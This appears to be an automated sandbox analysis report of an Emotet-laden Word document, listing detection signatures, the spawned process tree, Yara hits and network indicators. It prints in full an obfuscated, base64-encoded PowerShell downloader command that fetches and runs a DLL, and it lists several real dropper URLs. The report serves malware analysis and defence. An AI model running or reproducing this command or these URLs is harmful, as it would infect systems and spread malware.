Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report bestand-8881014518 00944.doc

Overview

General Information

Sample Name:bestand-8881014518 00944.doc
Analysis ID:336501
MD5:8ce4185f17ed35f43462f2f44c1cfc3d
SHA1:9c6396150dd23a65c36e84af69e15543cedca4d2
SHA256:4425de724449dedb3b183a3bfd567f9d3449c2457a1e2fd695019b1b6227e035

Most interesting Screenshot:

Detection

Emotet
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Yara detected Emotet
Creates processes via WMI
Document contains an embedded VBA macro with suspicious strings
Document contains an embedded VBA with base64 encoded strings
Document contains an embedded VBA with many GOTO operations indicating source code obfuscation
Encrypted powershell cmdline option found
Hides that the sample has been downloaded from the Internet (zone.identifier)
Obfuscated command line found
Potential dropper URLs found in powershell memory
PowerShell case anomaly found
Powershell drops PE file
Suspicious powershell command line found
Very long command line found
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Downloads executable code via HTTP
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Startup

  • System is w7x64
  • WINWORD.EXE (PID: 2308 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 95C38D04597050285A18F66039EDB456)
  • cmd.exe (PID: 2288 cmdline: cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD JAA5ADUAWABVAGMARAAgACAAPQAgACAAWwBUAFkAcABFAF0AKAAiAHsAMAB9AHsAMgB9AHsANAB9AHsAMwB9AHsAMQB9ACIAIAAtAGYAJwBTAFkAUwBUAGUAJwAsACcAQwBUAE8AUgB5ACcALAAnAE0AJwAsACcAUgBFACcALAAnAC4AaQBvAC4AZABJACcAKQAgACAAOwAgACAAcwBFAFQALQBJAHQARQBtACAAIAAoACcAVgAnACsAJwBhAHIAaQBBAEIATABlACcAKwAnADoARgBJAFUAJwApACAAIAAoACAAIABbAHQAeQBwAEUAXQAoACIAewAxAH0AewA0AH0AewAwAH0AewA2AH0AewA1AH0AewAzAH0AewAyAH0AIgAgAC0AZgAnAE0ALgBuAEUAVAAuAFMAZQBSACcALAAnAHMAWQBzAHQAJwAsACcAVABNAGEATgBBAEcAZQByACcALAAnAE4AJwAsACcARQAnACwAJwBJACcALAAnAHYASQBjAEUAUABvACcAKQApADsAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACcAUwBpACcAKwAoACcAbABlACcAKwAnAG4AJwApACsAKAAnAHQAJwArACcAbAB5AEMAJwApACsAKAAnAG8AJwArACcAbgB0ACcAKQArACgAJwBpACcAKwAnAG4AdQBlACcAKQApADsAJABIAGMANgBjADYAdQB5AD0AJABJADcANgBDACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABUADMANgBTADsAJABWADAANgBCAD0AKAAnAEkAMwAnACsAJwA5AEgAJwApADsAIAAgACgAZwBjAEkAIAAoACIAVgBBACIAKwAiAHIAaQBBAEIAIgArACIAbAAiACsAIgBFADoAOQA1ACIAKwAiAFgAdQBDAGQAIgApACAAIAApAC4AVgBhAEwAVQBlADoAOgAiAGMAUgBlAGEAVABgAEUAZABgAEkAUgBgAEUAYABDAFQATwBSAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ADAAfQBDADMAcgBlACcAKwAnADUAYwAzAHsAMAB9ACcAKwAnAEQAaQAnACsAJwBfAHAAJwArACcAMwAnACsAJwBjADkAJwArACcAewAwAH0AJwApAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAEQAMQA1AEIAPQAoACgAJwBHADIAJwArACcAOAAnACkAKwAnAE8AJwApADsAIAAkAGYAaQB1ADoAOgAiAHMAZQBgAGMAYABVAHIASQBUAFkAcABSAG8AVABPAGAAYwBPAEwAIgAgAD0AIAAoACgAJwBUACcAKwAnAGwAcwAnACkAKwAnADEAMgAnACkAOwAkAFIAMwAyAEYAPQAoACcARwAnACsAKAAnADEANgAnACsAJwBaACcAKQApADsAJABDADcAegBpADkAdQB1ACAAPQAgACgAJwBPACcAKwAoACcAXwAnACsAJwA1AFoAJwApACkAOwAkAFcAXwAxAEQAPQAoACcARQAnACsAKAAnADEAOQAnACsAJwBUACcAKQApADsAJABXADcAaQBvADAAdwBnAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0AJwArACgAJwBDACcAKwAnADMAcgBlADUAJwApACsAJwBjADMAJwArACcAewAnACsAJwAwAH0ARABpAF8AcAAzAGMAJwArACcAOQB7ACcAKwAnADAAfQAnACkALQBGAFsAQwBoAGEAcgBdADkAMgApACsAJABDADcAegBpADkAdQB1ACsAKAAnAC4AZAAnACsAJwBsAGwAJwApADsAJABIADMANgBBAD0AKAAnAFIAJwArACgAJwA2AF8AJwArACcATwAnACkAKQA7ACQARwByADYAeABfAGgAXwA9ACgAKAAnAF0AYQAnACsAJwBuAHcAWwAzACcAKwAnADoALwAnACkAKwAnAC8AJwArACgAJwBwACcAKwAnAGUAdABhAGYAJwApACsAKAAnAGkAbABtACcAKwAnAC4AYwBvACcAKQArACcAbQAnACsAKAAnAC8AdwAnACsAJwBwACcAKQArACgAJwAtAGEAJwArACcAZABtACcAKwAnAGkAbgAnACsAJwAvADQAbQAvAEAAXQAnACkAKwAnAGEAJwArACgAJwBuACcAKwAnAHcAWwAzACcAKwAnADoALwAvAGcAaQAnACsAJwB2AGkAJwApACsAKAAnAG4AZwAnACsAJwB0AGgAYQAnACsAJwBuAGsAcwBkACcAKQArACcAYQBpACcAKwAnAGwAJwArACgAJwB5AC4AYwAnACsAJwBvAG0ALwBxAGwARQAvAFYAZQBGAC8AJwArACcAQABdAGEAJwArACcAbgAnACkAKwAoACcAdwAnACsAJwBbADMAOgAvAC8AdwAnACkAKwAoACcAYQBwACcAKwAnAC4AJwApACsAJwB6AGgAJwArACgAJwBvAG4AZwAnACsAJwBsACcAKQArACcAaQAnACsAKAAnAHMAYwAnACsAJwAuAGMAJwArACcAbwAnACsAJwBtAC8AdwBwAC0AaQBuAGMAJwApACsAKAAnAGwAdQAnACsAJwBkAGUAcwAnACsAJwAvAFEAcgAnACsAJwB5AEMAJwApACsAJwBCAC8AJwArACcAQAAnACsAKAAnAF0AJwArACcAYQBuAHcAJwApACsAKAAnAFsAMwAnACsAJwBzADoALwAnACsAJwAvAGYAJwArACcAbgAnACsAJwBqAGIAcQAuAGMAbwBtAC8AdwBwAC0AaQAnACkAKwAoACcAbgBjACcAKwAnAGwAdQBkAGUAJwArACcAcwAvACcAKQArACgAJwByACcAKwAnAGwAUgAvAEAAJwArACcAXQBhAG4AdwBbACcAKwAnADMAcwAnACsAJwA6AC8ALwBzAGEAawAnACkAKwAoACcAaAAnACsAJwBpAHMAdQBoACcAKwAnAGEAbgAnACkAKwAnAGkAJwArACgAJwBuACcAKwAnAGEAcgBpAGoAZQAnACkAKwAoACcAZQB2AGkAawAnACsAJwBhAC4AJwApACsAKAAnAGMAJwArACcAbwBtAC8AJwApACsAJwB3ACcAKwAoACcAcAAnACsAJwAtAGkAJwApACsAKAAnAG4AYwAnACsAJwBsAHUAZAAnACkAKwAoACcAZQBzACcAKwAnAC8AQwB2AEcAJwApACsAKAAnAFUAJwArACcAagB2AEUALwBAAF0AJwArACcAYQBuAHcAWwAzADoAJwArACcALwAnACkAKwAoACcALwAnACsAJwB6ACcAKwAnAGkAZQBmAGwAaQB4ACcAKQArACgAJwAuACcAKwAnAHQAZQBsAGUAJwArACcAcwBrACcAKwAnAG8AJwArACcAcABzAHQAbwByAGUALgBjAG8AJwArACcAbQAnACkAKwAnAC8AYwAnACsAJwBnAGkAJwArACgAJwAtACcAKwAnAGIAaQBuACcAKQArACgAJwAvAEcAJwArACcAdAAzAFMALwBAACcAKQArACcAXQAnACsAJwBhAG4AJwArACgAJwB3AFsAJwArACcAMwAnACkAKwAnAHMAOgAnACsAKAAnAC8ALwBzAG8AbQBhAG4AYQBwAC4AYwBvACcAKwAnAG0ALwB3AHAAJwArACcALQBhAGQAJwArACcAbQAnACkAKwAoACcAaQBuACcAKwAnAC8AJwApACsAJwBQAC8AJwApAC4AIgByAGUAUABMAGAAQQBjAEUAIgAoACgAKAAnAF0AYQAnACsAJwBuAHcAJwApACsAJwBbACcAKwAnADMAJwApACwAKABbAGEAcgByAGEAeQBdACgAJwBzAGQAJwAsACcAcwB3ACcAKQAsACgAKAAnAGgAdAAnACsAJwB0ACcAKQArACcAcAAnACkALAAnADMAZAAnACkAWwAxAF0AKQAuACIAcwBgAHAAbABpAFQAIgAoACQAUQA5ADMASAAgACsAIAAkAEgAYwA2AGMANgB1AHkAIAArACAAJABIADgAOQBaACkAOwAkAEUANwA1AFYAPQAoACgAJwBJACcAKwAnADEANwAnACkAKwAnAFgAJwApADsAZgBvAHIAZQBhAGMAaAAgACgAJABDAGoAawBlADAAbABlACAAaQBuACAAJABHAHIANgB4AF8AaABfACkAewB0AHIAeQB7ACgALgAoACcATgBlAHcAJwArACcALQBPAGIAagBlAGMAJwArACcAdAAnACkAIABzAHkAUwB0AGUAbQAuAE4AZQB0AC4AVwBFAGIAYwBMAEkARQBuAHQAKQAuACIAZABvAHcAYABOAGwATwBgAEEAYABEAGYASQBsAGUAIgAoACQAQwBqAGsAZQAwAGwAZQAsACAAJABXADcAaQBvADAAdwBnACkAOwAkAFIANQA1AFMAPQAoACcAQgAnACsAKAAnADYANgAnACsAJwBTACcAKQApADsASQBmACAAKAAoAC4AKAAnAEcAZQAnACsAJwB0AC0ASQB0AGUAbQAnACkAIAAkAFcANwBpAG8AMAB3AGcAKQAuACIAbABgAEUAbgBHAGAAVABoACIAIAAtAGcAZQAgADQAMwAxADIANgApACAAewAmACgAJwByAHUAbgAnACsAJwBkACcAKwAnAGwAbAAzADIAJwApACAAJABXADcAaQBvADAAdwBnACwAKAAoACcAQwBvAG4AJwArACcAdAByAG8AJwApACsAKAAnAGwAJwArACcAXwBSAHUAJwApACsAJwBuAEQAJwArACcATABMACcAKQAuACIAdABgAE8AcwBgAFQAUgBJAG4AZwAiACgAKQA7ACQAWgAwADAAUAA9ACgAKAAnAFIAOQAnACsAJwA0ACcAKQArACcASgAnACkAOwBiAHIAZQBhAGsAOwAkAEcAOQAyAEkAPQAoACcAVQA4ACcAKwAnADkAWQAnACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAFoAMQA3AE0APQAoACcASwA3ACcAKwAnADkAVQAnACkA MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
    • msg.exe (PID: 2452 cmdline: msg user /v Word experienced an error trying to open the file. MD5: 2214979661E779C3E3C33D4F14E6F3AC)
    • powershell.exe (PID: 1100 cmdline: POwersheLL -w hidden -ENCOD JAA5ADUAWABVAGMARAAgACAAPQAgACAAWwBUAFkAcABFAF0AKAAiAHsAMAB9AHsAMgB9AHsANAB9AHsAMwB9AHsAMQB9ACIAIAAtAGYAJwBTAFkAUwBUAGUAJwAsACcAQwBUAE8AUgB5ACcALAAnAE0AJwAsACcAUgBFACcALAAnAC4AaQBvAC4AZABJACcAKQAgACAAOwAgACAAcwBFAFQALQBJAHQARQBtACAAIAAoACcAVgAnACsAJwBhAHIAaQBBAEIATABlACcAKwAnADoARgBJAFUAJwApACAAIAAoACAAIABbAHQAeQBwAEUAXQAoACIAewAxAH0AewA0AH0AewAwAH0AewA2AH0AewA1AH0AewAzAH0AewAyAH0AIgAgAC0AZgAnAE0ALgBuAEUAVAAuAFMAZQBSACcALAAnAHMAWQBzAHQAJwAsACcAVABNAGEATgBBAEcAZQByACcALAAnAE4AJwAsACcARQAnACwAJwBJACcALAAnAHYASQBjAEUAUABvACcAKQApADsAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACcAUwBpACcAKwAoACcAbABlACcAKwAnAG4AJwApACsAKAAnAHQAJwArACcAbAB5AEMAJwApACsAKAAnAG8AJwArACcAbgB0ACcAKQArACgAJwBpACcAKwAnAG4AdQBlACcAKQApADsAJABIAGMANgBjADYAdQB5AD0AJABJADcANgBDACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABUADMANgBTADsAJABWADAANgBCAD0AKAAnAEkAMwAnACsAJwA5AEgAJwApADsAIAAgACgAZwBjAEkAIAAoACIAVgBBACIAKwAiAHIAaQBBAEIAIgArACIAbAAiACsAIgBFADoAOQA1ACIAKwAiAFgAdQBDAGQAIgApACAAIAApAC4AVgBhAEwAVQBlADoAOgAiAGMAUgBlAGEAVABgAEUAZABgAEkAUgBgAEUAYABDAFQATwBSAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ADAAfQBDADMAcgBlACcAKwAnADUAYwAzAHsAMAB9ACcAKwAnAEQAaQAnACsAJwBfAHAAJwArACcAMwAnACsAJwBjADkAJwArACcAewAwAH0AJwApAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAEQAMQA1AEIAPQAoACgAJwBHADIAJwArACcAOAAnACkAKwAnAE8AJwApADsAIAAkAGYAaQB1ADoAOgAiAHMAZQBgAGMAYABVAHIASQBUAFkAcABSAG8AVABPAGAAYwBPAEwAIgAgAD0AIAAoACgAJwBUACcAKwAnAGwAcwAnACkAKwAnADEAMgAnACkAOwAkAFIAMwAyAEYAPQAoACcARwAnACsAKAAnADEANgAnACsAJwBaACcAKQApADsAJABDADcAegBpADkAdQB1ACAAPQAgACgAJwBPACcAKwAoACcAXwAnACsAJwA1AFoAJwApACkAOwAkAFcAXwAxAEQAPQAoACcARQAnACsAKAAnADEAOQAnACsAJwBUACcAKQApADsAJABXADcAaQBvADAAdwBnAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0AJwArACgAJwBDACcAKwAnADMAcgBlADUAJwApACsAJwBjADMAJwArACcAewAnACsAJwAwAH0ARABpAF8AcAAzAGMAJwArACcAOQB7ACcAKwAnADAAfQAnACkALQBGAFsAQwBoAGEAcgBdADkAMgApACsAJABDADcAegBpADkAdQB1ACsAKAAnAC4AZAAnACsAJwBsAGwAJwApADsAJABIADMANgBBAD0AKAAnAFIAJwArACgAJwA2AF8AJwArACcATwAnACkAKQA7ACQARwByADYAeABfAGgAXwA9ACgAKAAnAF0AYQAnACsAJwBuAHcAWwAzACcAKwAnADoALwAnACkAKwAnAC8AJwArACgAJwBwACcAKwAnAGUAdABhAGYAJwApACsAKAAnAGkAbABtACcAKwAnAC4AYwBvACcAKQArACcAbQAnACsAKAAnAC8AdwAnACsAJwBwACcAKQArACgAJwAtAGEAJwArACcAZABtACcAKwAnAGkAbgAnACsAJwAvADQAbQAvAEAAXQAnACkAKwAnAGEAJwArACgAJwBuACcAKwAnAHcAWwAzACcAKwAnADoALwAvAGcAaQAnACsAJwB2AGkAJwApACsAKAAnAG4AZwAnACsAJwB0AGgAYQAnACsAJwBuAGsAcwBkACcAKQArACcAYQBpACcAKwAnAGwAJwArACgAJwB5AC4AYwAnACsAJwBvAG0ALwBxAGwARQAvAFYAZQBGAC8AJwArACcAQABdAGEAJwArACcAbgAnACkAKwAoACcAdwAnACsAJwBbADMAOgAvAC8AdwAnACkAKwAoACcAYQBwACcAKwAnAC4AJwApACsAJwB6AGgAJwArACgAJwBvAG4AZwAnACsAJwBsACcAKQArACcAaQAnACsAKAAnAHMAYwAnACsAJwAuAGMAJwArACcAbwAnACsAJwBtAC8AdwBwAC0AaQBuAGMAJwApACsAKAAnAGwAdQAnACsAJwBkAGUAcwAnACsAJwAvAFEAcgAnACsAJwB5AEMAJwApACsAJwBCAC8AJwArACcAQAAnACsAKAAnAF0AJwArACcAYQBuAHcAJwApACsAKAAnAFsAMwAnACsAJwBzADoALwAnACsAJwAvAGYAJwArACcAbgAnACsAJwBqAGIAcQAuAGMAbwBtAC8AdwBwAC0AaQAnACkAKwAoACcAbgBjACcAKwAnAGwAdQBkAGUAJwArACcAcwAvACcAKQArACgAJwByACcAKwAnAGwAUgAvAEAAJwArACcAXQBhAG4AdwBbACcAKwAnADMAcwAnACsAJwA6AC8ALwBzAGEAawAnACkAKwAoACcAaAAnACsAJwBpAHMAdQBoACcAKwAnAGEAbgAnACkAKwAnAGkAJwArACgAJwBuACcAKwAnAGEAcgBpAGoAZQAnACkAKwAoACcAZQB2AGkAawAnACsAJwBhAC4AJwApACsAKAAnAGMAJwArACcAbwBtAC8AJwApACsAJwB3ACcAKwAoACcAcAAnACsAJwAtAGkAJwApACsAKAAnAG4AYwAnACsAJwBsAHUAZAAnACkAKwAoACcAZQBzACcAKwAnAC8AQwB2AEcAJwApACsAKAAnAFUAJwArACcAagB2AEUALwBAAF0AJwArACcAYQBuAHcAWwAzADoAJwArACcALwAnACkAKwAoACcALwAnACsAJwB6ACcAKwAnAGkAZQBmAGwAaQB4ACcAKQArACgAJwAuACcAKwAnAHQAZQBsAGUAJwArACcAcwBrACcAKwAnAG8AJwArACcAcABzAHQAbwByAGUALgBjAG8AJwArACcAbQAnACkAKwAnAC8AYwAnACsAJwBnAGkAJwArACgAJwAtACcAKwAnAGIAaQBuACcAKQArACgAJwAvAEcAJwArACcAdAAzAFMALwBAACcAKQArACcAXQAnACsAJwBhAG4AJwArACgAJwB3AFsAJwArACcAMwAnACkAKwAnAHMAOgAnACsAKAAnAC8ALwBzAG8AbQBhAG4AYQBwAC4AYwBvACcAKwAnAG0ALwB3AHAAJwArACcALQBhAGQAJwArACcAbQAnACkAKwAoACcAaQBuACcAKwAnAC8AJwApACsAJwBQAC8AJwApAC4AIgByAGUAUABMAGAAQQBjAEUAIgAoACgAKAAnAF0AYQAnACsAJwBuAHcAJwApACsAJwBbACcAKwAnADMAJwApACwAKABbAGEAcgByAGEAeQBdACgAJwBzAGQAJwAsACcAcwB3ACcAKQAsACgAKAAnAGgAdAAnACsAJwB0ACcAKQArACcAcAAnACkALAAnADMAZAAnACkAWwAxAF0AKQAuACIAcwBgAHAAbABpAFQAIgAoACQAUQA5ADMASAAgACsAIAAkAEgAYwA2AGMANgB1AHkAIAArACAAJABIADgAOQBaACkAOwAkAEUANwA1AFYAPQAoACgAJwBJACcAKwAnADEANwAnACkAKwAnAFgAJwApADsAZgBvAHIAZQBhAGMAaAAgACgAJABDAGoAawBlADAAbABlACAAaQBuACAAJABHAHIANgB4AF8AaABfACkAewB0AHIAeQB7ACgALgAoACcATgBlAHcAJwArACcALQBPAGIAagBlAGMAJwArACcAdAAnACkAIABzAHkAUwB0AGUAbQAuAE4AZQB0AC4AVwBFAGIAYwBMAEkARQBuAHQAKQAuACIAZABvAHcAYABOAGwATwBgAEEAYABEAGYASQBsAGUAIgAoACQAQwBqAGsAZQAwAGwAZQAsACAAJABXADcAaQBvADAAdwBnACkAOwAkAFIANQA1AFMAPQAoACcAQgAnACsAKAAnADYANgAnACsAJwBTACcAKQApADsASQBmACAAKAAoAC4AKAAnAEcAZQAnACsAJwB0AC0ASQB0AGUAbQAnACkAIAAkAFcANwBpAG8AMAB3AGcAKQAuACIAbABgAEUAbgBHAGAAVABoACIAIAAtAGcAZQAgADQAMwAxADIANgApACAAewAmACgAJwByAHUAbgAnACsAJwBkACcAKwAnAGwAbAAzADIAJwApACAAJABXADcAaQBvADAAdwBnACwAKAAoACcAQwBvAG4AJwArACcAdAByAG8AJwApACsAKAAnAGwAJwArACcAXwBSAHUAJwApACsAJwBuAEQAJwArACcATABMACcAKQAuACIAdABgAE8AcwBgAFQAUgBJAG4AZwAiACgAKQA7ACQAWgAwADAAUAA9ACgAKAAnAFIAOQAnACsAJwA0ACcAKQArACcASgAnACkAOwBiAHIAZQBhAGsAOwAkAEcAOQAyAEkAPQAoACcAVQA4ACcAKwAnADkAWQAnACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAFoAMQA3AE0APQAoACcASwA3ACcAKwAnADkAVQAnACkA MD5: 852D67A27E454BD389FA7F02A8CBE23F)
      • rundll32.exe (PID: 2312 cmdline: 'C:\Windows\system32\rundll32.exe' C:\Users\user\C3re5c3\Di_p3c9\O_5Z.dll Control_RunDLL MD5: DD81D91FF3B0763C392422865C9AC12E)
        • rundll32.exe (PID: 2556 cmdline: 'C:\Windows\system32\rundll32.exe' C:\Users\user\C3re5c3\Di_p3c9\O_5Z.dll Control_RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)
          • rundll32.exe (PID: 2500 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Vpdqbmffwwlyu\elrrcydsvvol.uui',Control_RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)
            • rundll32.exe (PID: 2676 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ygrfxgybds\jrwpxihfr.rob',Control_RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)
              • rundll32.exe (PID: 2828 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Lydzwviczteg\jfrrzuskryo.byz',Control_RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                • rundll32.exe (PID: 2724 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Wmhtpvmxcctn\ytalpvmidll.mdf',Control_RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                  • rundll32.exe (PID: 2800 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Grdxtrtyl\kmtzbbgl.dxh',Control_RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                    • rundll32.exe (PID: 2384 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Wgsitvbdu\kifteejg.dsr',Control_RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                      • rundll32.exe (PID: 2960 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Extnaatd\rvydpsb.zwq',Control_RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                        • rundll32.exe (PID: 2948 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Rvuszsgopfi\mtjvkbmtlk.dym',Control_RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                          • rundll32.exe (PID: 2252 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Oqhzdezq\bectafh.dff',Control_RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                            • rundll32.exe (PID: 1748 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Weiwdqzj\qfklela.qlk',Control_RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                              • rundll32.exe (PID: 1900 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Vvjepckhx\flnsfzgm.bdf',Control_RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                                • rundll32.exe (PID: 3000 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ikstsciju\uxbijfvp.mja',Control_RunDLL MD5: 51138BEEA3E2C21EC44D0932C71762A8)
  • cleanup

Malware Configuration

Threatname: Emotet

{"RSA Public Key": "MHwwDQYJKoZIhvcNAQEBBQADawAwaAJhAOZ9fLJ8UrI0OZURpPsR3eijAyfPj3z6\nuS75f2igmYFW2aWgNcFIzsAYQleKzD0nlCFHOo7Zf8/4wY2UW0CJ4dJEHnE/PHlz\n6uNk3pxjm7o4eCDyiJbzf+k0Azjl0q54FQIDAQAB"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000009.00000002.2098442031.00000000003A1000.00000020.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
    00000012.00000002.2346389267.00000000003D1000.00000020.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
      00000007.00000002.2095140776.0000000000240000.00000040.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
        0000000F.00000002.2108654595.00000000020A1000.00000020.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
          0000000A.00000002.2099597236.00000000001B0000.00000040.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
            Click to see the 21 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            13.2.rundll32.exe.240000.0.raw.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
              9.2.rundll32.exe.2f0000.0.raw.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
                11.2.rundll32.exe.3a0000.0.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
                  16.2.rundll32.exe.230000.1.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
                    14.2.rundll32.exe.1b0000.0.raw.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
                      Click to see the 31 entries

                      Sigma Overview

                      No Sigma rule has matched

                      Signature Overview

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection:

                      barindex
                      Antivirus detection for URL or domainShow sources
                      Source: https://fnjbq.com/wp-includes/rlR/Avira URL Cloud: Label: malware
                      Source: http://wap.zhonglisc.com/wp-includes/QryCB/Avira URL Cloud: Label: malware
                      Source: http://petafilm.com/wp-admin/4m/Avira URL Cloud: Label: malware
                      Source: https://sakhisuhaninarijeevika.com/wp-includes/CvGUjvE/Avira URL Cloud: Label: malware
                      Multi AV Scanner detection for domain / URLShow sources
                      Source: petafilm.comVirustotal: Detection: 6%Perma Link
                      Source: http://petafilm.comVirustotal: Detection: 6%Perma Link
                      Multi AV Scanner detection for submitted fileShow sources
                      Source: bestand-8881014518 00944.docVirustotal: Detection: 31%Perma Link
                      Source: bestand-8881014518 00944.docReversingLabs: Detection: 47%
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100011C0 Control_RunDLL,VirtualAlloc,VirtualAlloc,GetModuleHandleExA,VirtualAlloc,GetProcAddress,GetProcAddress,VirtualAlloc,GetProcAddress,LdrFindResource_U,LdrAccessResource,CryptAcquireContextW,CryptAcquireContextW,CryptAcquireContextW,CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptDeriveKey,VirtualAlloc,_memmove,CryptEncrypt,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100021F0 CryptStringToBinaryW,CoTaskMemAlloc,CryptStringToBinaryW,StgDeserializePropVariant,CoTaskMemFree,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10002730 StgSerializePropVariant,CryptBinaryToStringW,CoTaskMemAlloc,CryptBinaryToStringW,CoTaskMemFree,CoTaskMemFree,
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
                      Source: global trafficDNS query: name: petafilm.com
                      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 176.53.69.151:80
                      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 176.53.69.151:80

                      Networking:

                      barindex
                      Potential dropper URLs found in powershell memoryShow sources
                      Source: powershell.exe, 00000005.00000002.2101156102.0000000003734000.00000004.00000001.sdmpString found in memory: http://petafilm.com/wp-admin/4m/
                      Source: powershell.exe, 00000005.00000002.2101156102.0000000003734000.00000004.00000001.sdmpString found in memory: http://givingthanksdaily.com/qlE/VeF/
                      Source: powershell.exe, 00000005.00000002.2101156102.0000000003734000.00000004.00000001.sdmpString found in memory: http://wap.zhonglisc.com/wp-includes/QryCB/
                      Source: powershell.exe, 00000005.00000002.2101156102.0000000003734000.00000004.00000001.sdmpString found in memory: https://fnjbq.com/wp-includes/rlR/
                      Source: powershell.exe, 00000005.00000002.2101156102.0000000003734000.00000004.00000001.sdmpString found in memory: https://sakhisuhaninarijeevika.com/wp-includes/CvGUjvE/
